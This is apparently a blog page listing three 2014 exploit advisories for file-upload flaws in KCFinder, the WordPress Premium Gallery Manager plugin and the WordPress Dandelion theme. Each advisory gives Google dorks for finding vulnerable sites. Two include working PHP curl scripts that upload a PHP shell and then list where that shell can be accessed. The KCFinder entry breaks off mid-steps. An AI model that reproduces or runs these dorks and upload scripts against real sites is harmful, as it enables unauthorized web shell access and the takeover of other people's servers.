upload

KCFinder 2.53 Shell Upload vulnerability

By |April 2nd, 2014|

Exploit Title : KCFinder Upload Shell Vulnerability
Date : 24/04/2014
Google Dork : inurl:/kcfinder/browse.php
Exploit Author : Iranian_Dark_Coders_Team
Home : http://www.idc-team.net
Discovered By : Black.Hack3r
Vendor Homepage : http://kcfinder.sunhater.com/
Version : 2.51 – 2.53
Tested on : Windows 8 & Linux

Events location bug:
http://[localhost]/[path]/kcfinder/config.php
Line 51: ‘deniedExts’ => “exe com msi bat php phps phtml php3 php4 cgi pl”,

Exploit:
http://[localhost]/kcfinder/browse.php
http://[localhost]/[path]/kcfinder/browse.php
Proof:

STEP 1: Go to target link
http://localhost/KCFinder/browse.php

STEP […]

Comments Off on KCFinder 2.53 Shell Upload vulnerability

WP Plugins Premium Gallery Manager Arbitrary File Upload

By |March 18th, 2014|

exploit title: WP Plugins Premium Gallery Manager Arbitrary File Upload
Author: eX-Sh1Ne
Author Facebook: www.fb.me/ShiNe.gov
Date: 03-2014
GoogleDork: inurl:”wp-content/plugins/Premium_Gallery_Manager”

Vulnerable path:
site.com/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php

Exploit:

< -?- php $uploadfile="Sh1Ne.php.jpg"; $ch= curl_init("http://127.0.0.1:8080/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php"); curl_setopt($ch,CURLOPT_POST,true); curl_setopt($ch,CURLOPT_POSTFIELDS, array('Filedata'=>“@$uploadfile”,
‘folder’=>’/wp-content/plugins/Premium_Gallery_Manager/uploadify/’));
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
$postResult=curl_exec($ch);
curl_close($ch);
print”$postResult”;
? >

ShellAccess:

http://localhost:8080/wp-content/plugins/Premium_Gallery_Manager/uploadify/Sh1Ne.php.jpg
or
http://localhost:8080/wp-content/uploads/[years]/[month]/

Comments Off on WP Plugins Premium Gallery Manager Arbitrary File Upload

WordPress Dandelion Theme Shell Upload Vulnerability

By |February 8th, 2014|

Exploit Title: WordPress Dandelion Theme Shell Upload Vulnerability
Google Dork: inurl:/wp-content/themes/dandelion/
Date: 31/01/2014
Exploit Author: TheBlackMonster (Marouane)
Vendor Homepage: http://themeforest.net/item/dandelion-powerful-elegant-wordpress-theme/136628
Software Link: Not Available
Version: Web Application
Tested on: Mozilla, Chrome, Opera -> Windows & Linux

CoDE:

< ? php $uploadfile="yourfile.php"; $ch = curl_init("http://127.0.0.1:8080/wp-content/themes/dandelion/functions/upload-handler.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>“@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
? >

File Access :

http://127.0.0.1:8080/uploads/[years]/[month]/your_shell.php

Comments Off on WordPress Dandelion Theme Shell Upload Vulnerability